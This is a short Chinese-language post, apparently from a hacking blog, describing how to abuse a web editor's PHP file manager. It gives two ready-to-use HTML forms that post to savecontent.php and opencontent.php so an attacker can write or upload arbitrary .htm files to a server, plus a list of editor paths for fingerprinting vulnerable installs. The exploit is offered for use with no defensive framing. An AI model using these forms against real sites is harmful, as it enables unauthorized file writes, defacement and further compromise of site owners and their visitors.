直接写htm文件,文件名:tmpcontent.htm:

<form name="frm" enctype="multipart/form-data" method="post" action="http://localhost/editor/filemanager/php/savecontent.php">
<textarea name="htmlsource" cols="30" rows="4"></textarea><br />
<input type="submit" name="submit" value="GO FUCK" />
</form>

直接上传htm文件:文件名:tmpcontent.htm

<form name="up" enctype="multipart/form-data" method="post" action="http://localhost/editor/filemanager/php/opencontent.php">
<input type="file" name="htmlFile" /><br />
<input type="submit" name="submit" value="GO FUCK" />
</form>

写个htm文件到服务器你们会发现会解析的!

 

编辑器判断方法:
editor/history
editor/license
editor/htmlarea
editor/samples/sample_euckr.htm
editor/samples/sample_utf8.htm
editor/filemanager/php/upload.php
editor/filemanager/php/savecontent.php
editor/filemanager/php/filemanager_lib.php

相关文章:

  • 2022-12-23
  • 2021-06-15
  • 2022-12-23
  • 2021-12-05
  • 2021-12-09
  • 2021-11-10
  • 2021-07-05
  • 2022-02-10
猜你喜欢
  • 2021-10-04
  • 2021-04-13
  • 2022-12-23
  • 2021-11-04
  • 2021-09-01
  • 2021-05-30
  • 2021-10-06
相关资源
相似解决方案